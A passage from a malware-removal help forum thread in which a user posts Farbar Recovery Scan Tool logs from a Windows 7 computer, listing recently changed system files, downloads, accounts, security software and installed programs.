2015-11-16 20:08 - 00705536 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll2016-01-12 17:21 - 2015-11-16 20:08 - 00505856 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll2016-01-12 17:21 - 2015-11-16 20:08 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll2016-01-12 17:21 - 2015-11-16 15:17 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll2016-01-12 17:20 - 2015-12-30 14:08 - 05572544 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe2016-01-12 17:20 - 2015-12-30 14:08 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys2016-01-12 17:20 - 2015-12-30 14:08 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys2016-01-12 17:20 - 2015-12-30 14:05 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll2016-01-12 17:20 - 2015-12-30 14:02 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll2016-01-12 17:20 - 2015-12-30 14:02 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll2016-01-12 17:20 - 2015-12-30 14:02 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll2016-01-12 17:20 - 2015-12-30 14:02 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll2016-01-12 17:20 - 2015-12-30 14:02 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll2016-01-12 17:20 - 2015-12-30 14:02 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll2016-01-12 17:20 - 2015-12-30 14:01 - 01214464 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll2016-01-12 17:20 - 2015-12-30 14:01 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll2016-01-12 17:20 - 2015-12-30 14:01 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll2016-01-12 17:20 - 2015-12-30 14:01 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll2016-01-12 17:20 - 2015-12-30 14:01 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll2016-01-12 17:20 - 2015-12-30 14:01 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll2016-01-12 17:20 - 2015-12-30 14:01 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll2016-01-12 17:20 - 2015-12-30 14:00 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll2016-01-12 17:20 - 2015-12-30 13:59 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll2016-01-12 17:20 - 2015-12-30 13:59 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll2016-01-12 17:20 - 2015-12-30 13:59 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll2016-01-12 17:20 - 2015-12-30 13:58 - 01461248 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll2016-01-12 17:20 - 2015-12-30 13:58 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll2016-01-12 17:20 - 2015-12-30 13:57 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll2016-01-12 17:20 - 2015-12-30 13:57 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll2016-01-12 17:20 - 2015-12-30 13:57 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll2016-01-12 17:20 - 2015-12-30 13:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll2016-01-12 17:20 - 2015-12-30 13:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll2016-01-12 17:20 - 2015-12-30 13:55 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:47 - 03993536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe2016-01-12 17:20 - 2015-12-30 13:47 - 03938240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe2016-01-12 17:20 - 2015-12-30 13:44 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll2016-01-12 17:20 - 2015-12-30 13:41 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll2016-01-12 17:20 - 2015-12-30 13:41 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll2016-01-12 17:20 - 2015-12-30 13:40 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll2016-01-12 17:20 - 2015-12-30 13:40 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll2016-01-12 17:20 - 2015-12-30 13:39 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll2016-01-12 17:20 - 2015-12-30 13:39 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll2016-01-12 17:20 - 2015-12-30 13:39 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll2016-01-12 17:20 - 2015-12-30 13:39 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll2016-01-12 17:20 - 2015-12-30 13:38 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll2016-01-12 17:20 - 2015-12-30 13:38 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 12:57 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe2016-01-12 17:20 - 2015-12-30 12:50 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe2016-01-12 17:20 - 2015-12-30 12:49 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe2016-01-12 17:20 - 2015-12-30 12:44 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe2016-01-12 17:20 - 2015-12-30 12:43 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys2016-01-12 17:20 - 2015-12-30 12:42 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys2016-01-12 17:20 - 2015-12-30 12:42 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys2016-01-12 17:20 - 2015-12-30 12:41 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe2016-01-12 17:20 - 2015-12-30 12:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe2016-01-12 17:20 - 2015-12-30 12:32 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe2016-01-12 17:20 - 2015-12-30 12:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll2016-01-12 17:20 - 2015-12-30 12:32 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe2016-01-12 17:20 - 2015-12-30 12:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe2016-01-12 17:20 - 2015-12-30 12:30 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll2016-01-12 17:20 - 2015-12-30 12:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 12:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 12:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll2016-01-12 17:20 - 2015-12-30 12:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll2016-01-11 09:52 - 2016-01-11 09:52 - 00138800 _____ C:\Users\Rich\Downloads\psc-informed-consent.pdf2016-01-11 09:45 - 2016-01-26 08:17 - 00000000 ____D C:\Program Files (x86)\SafeConnect2016-01-11 09:45 - 2016-01-11 09:45 - 01464136 _____ (Impulse Point, LLC) C:\Users\Rich\Downloads\ServiceInstaller.exe2016-01-10 13:10 - 2016-01-10 13:10 - 00004785 _____ C:\Users\Rich\Downloads\class01_practice_2015.sav2016-01-09 09:37 - 2016-01-09 09:37 - 01893912 _____ C:\Users\Rich\Downloads\Change01_2014.pptx2016-01-09 09:36 - 2016-01-09 09:36 - 01129357 _____ C:\Users\Rich\Downloads\cron70.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00602838 _____ C:\Users\Rich\Downloads\ness74.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00596887 _____ C:\Users\Rich\Downloads\balt72.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00416574 _____ C:\Users\Rich\Downloads\temk99.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00365513 _____ C:\Users\Rich\Downloads\fitz02.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00223907 _____ C:\Users\Rich\Downloads\sing01.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00194872 _____ C:\Users\Rich\Downloads\dudek79.pdf2016-01-09 09:36 - 2016-01-09 09:36 - 00171171 _____ C:\Users\Rich\Downloads\sacz02.pdf2016-01-08 10:02 - 2016-01-08 10:02 - 00082067 _____ C:\Users\Rich\Downloads\merged_document.pdf2016-01-07 23:33 - 2016-01-07 23:33 - 00069042 _____ C:\Users\Rich\Downloads\RD Degree Status Verification.pdf2016-01-07 21:32 - 2016-01-07 21:32 - 00036305 _____ C:\Users\Rich\Downloads\Output1 (1).spv2016-01-06 10:29 - 2016-01-06 10:29 - 02977139 _____ C:\Users\Rich\Downloads\Mturk_Spring2014_OnlyWave1 (1).sav2016-01-05 22:37 - 2016-01-05 22:37 - 00000000 ____D C:\ProgramData\SPSS2016-01-04 10:19 - 2016-01-04 10:19 - 00046072 _____ C:\Users\Rich\Downloads\essentials_of_waisiv_assessment_second_edition.pdf2016-01-04 08:22 - 2016-01-04 08:22 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf2015-12-30 20:02 - 2015-12-30 20:02 - 02033244 _____ C:\Users\Rich\Downloads\FW%3a_Scanned_Documents.zip ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-26 16:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows2016-01-26 16:20 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02016-01-26 16:20 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02016-01-26 16:12 - 2015-11-14 17:18 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2016-01-26 16:11 - 2013-12-06 19:23 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job2016-01-26 08:26 - 2015-11-14 17:18 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2016-01-25 16:40 - 2015-11-14 13:25 - 00003914 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{AB878AF3-3B79-48B9-A24E-8D8D690D5155}2016-01-25 07:16 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT2016-01-24 16:20 - 2015-11-14 18:08 - 00000000 ____D C:\Users\Rich\Desktop\Work2016-01-22 16:39 - 2015-11-14 18:06 - 00000000 ____D C:\Users\Rich\Desktop\Misc2016-01-20 12:16 - 2013-12-06 19:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft2016-01-20 12:08 - 2015-11-14 18:02 - 00000000 ____D C:\Program Files\Microsoft Office 152016-01-19 19:35 - 2009-07-14 00:32 - 00000000 ____D C:\Windows\Downloaded Program Files2016-01-18 20:30 - 2015-11-14 20:33 - 00000000 ____D C:\Users\Rich\AppData\Local\CrashDumps2016-01-16 11:30 - 2015-11-14 13:22 - 00000000 ____D C:\Users\Rich2016-01-15 17:24 - 2015-11-14 19:25 - 00000000 ____D C:\Users\Rich\Documents\Media2016-01-14 22:07 - 2015-11-14 19:19 - 00000000 ____D C:\Users\Rich\AppData\Roaming\vlc2016-01-14 21:26 - 2009-07-14 00:13 - 00784286 _____ C:\Windows\system32\PerfStringBackup.INI2016-01-14 21:26 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf2016-01-14 20:35 - 2015-11-14 19:21 - 00000000 ____D C:\Users\Rich\AppData\Roaming\uTorrent2016-01-14 15:20 - 2009-07-13 23:45 - 00436464 _____ C:\Windows\system32\FNTCACHE.DAT2016-01-14 15:18 - 2015-11-14 16:46 - 00000000 ___SD C:\Windows\system32\CompatTel2016-01-14 15:18 - 2015-11-14 16:46 - 00000000 ____D C:\Windows\system32\appraiser2016-01-13 19:25 - 2015-11-14 17:07 - 00003176 _____ C:\Windows\System32\Tasks\HPCeeScheduleForRich2016-01-13 19:25 - 2015-11-14 17:07 - 00000328 _____ C:\Windows\Tasks\HPCeeScheduleForRich.job2016-01-13 16:14 - 2015-11-14 18:39 - 00000000 ____D C:\Users\Rich\Desktop\Classes2016-01-13 10:11 - 2015-11-14 13:53 - 00000000 ____D C:\Windows\system32\MRT2016-01-13 10:02 - 2015-11-14 13:53 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe2016-01-09 00:05 - 2015-12-02 15:20 - 00000000 ____D C:\Users\Rich\AppData\Local\Amos 22.02016-01-07 20:30 - 2015-11-14 18:31 - 00000000 ____D C:\Users\Rich\Desktop\Psych2016-01-05 22:48 - 2015-11-14 13:26 - 00112224 _____ C:\Users\Rich\AppData\Local\GDIPFONTCACHEV1.DAT2016-01-05 22:37 - 2015-11-14 20:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IBM SPSS Statistics2016-01-05 22:33 - 2015-12-02 14:56 - 00000014 _____ C:\Windows\SysWOW64\ssprs.tgz2016-01-05 22:33 - 2015-11-14 20:23 - 00000219 _____ C:\Windows\SysWOW64\lsprst7.tgz2016-01-05 22:33 - 2015-11-14 20:23 - 00000205 _____ C:\Windows\SysWOW64\lsprst7.dll2016-01-05 22:33 - 2015-11-14 20:23 - 00000016 ____H C:\Windows\SysWOW64\servdat.slm ==================== Files in the root of some directories ======= 2015-11-15 15:52 - 2015-11-15 16:57 - 0005949 _____ () C:\ProgramData\hpzinstall.log Some files in TEMP:====================C:\Users\Rich\AppData\Local\Temp\Extract.exeC:\Users\Rich\AppData\Local\Temp\McCSPInstall.dllC:\Users\Rich\AppData\Local\Temp\mccspuninstall.exeC:\Users\Rich\AppData\Local\Temp\NetFramework45.exeC:\Users\Rich\AppData\Local\Temp\SP63259.exeC:\Users\Rich\AppData\Local\Temp\SP64996.exeC:\Users\Rich\AppData\Local\Temp\SP69886.exeC:\Users\Rich\AppData\Local\Temp\SP70869.exeC:\Users\Rich\AppData\Local\Temp\SP71811.exeC:\Users\Rich\AppData\Local\Temp\UninstallHPSA.exe Some zero byte size files/folders:==========================C:\Windows\SysWOW64\nsprs.dllC:\Windows\SysWOW64\serauth1.dllC:\Windows\SysWOW64\serauth2.dllC:\Windows\SysWOW64\ssprs.dll ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signedC:\Windows\system32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\system32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\system32\services.exe => File is digitally signedC:\Windows\system32\User32.dll => File is digitally signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\system32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\system32\rpcss.dll => File is digitally signedC:\Windows\system32\dnsapi.dll => File is digitally signedC:\Windows\SysWOW64\dnsapi.dll => File is digitally signedC:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-01-10 23:03 ==================== End of FRST.txt ============================ Link to post Share on other sites More sharing options...
rpd Posted January 26, 2016 Author ID:1014853 Share Posted January 26, 2016 Double post because this log would not fit in the original post. Below is my addition log: Additional scan result of Farbar Recovery Scan Tool (x64) Version:25-01-2016Ran by Rich (2016-01-26 16:23:33)Running from C:\Users\Rich\DownloadsWindows 7 Professional Service Pack 1 (X64) (2015-11-14 18:22:08)Boot Mode: Normal========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3021336051-3703432070-3051997390-500 - Administrator - Disabled)Guest (S-1-5-21-3021336051-3703432070-3051997390-501 - Limited - Disabled)HomeGroupUser$ (S-1-5-21-3021336051-3703432070-3051997390-1003 - Limited - Enabled)Rich (S-1-5-21-3021336051-3703432070-3051997390-1001 - Administrator - Enabled) => C:\Users\Rich ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)64 Bit HP CIO Components Installer (Version: 6.2.2 - Hewlett-Packard) Hidden7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.8.800.175 - Adobe Systems Incorporated)Adobe Reader X (10.1.16) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.3.133 - Adobe Systems, Inc.)Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) HiddenBlackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) HiddenBonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)BufferChm (x32 Version: 140.0.212.000 - Hewlett-Packard) HiddenCarbonite (HKLM-x32\...\{003CAED4-63E2-4D51-B166-DEA06D6EC15D}) (Version: 5.8.2 build 5502 (Oct-15-2015) - Carbonite)Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) HiddenCisco AnyConnect Diagnostics and Reporting Tool (HKLM-x32\...\{44442706-3C57-4B2F-AF4D-0547B0DC29B6}) (Version: 4.1.06020 - Cisco Systems, Inc.)Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 4.1.06020 - Cisco Systems, Inc.)Cisco AnyConnect Secure Mobility Client (x32 Version: 4.1.06020 - Cisco Systems, Inc.) HiddenCisco AnyConnect Start Before Login Module (HKLM-x32\...\{8A546418-A74C-45B9-BAC6-6591C352D48F}) (Version: 4.1.06020 - Cisco Systems, Inc.)Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)Cisco PEAP Module 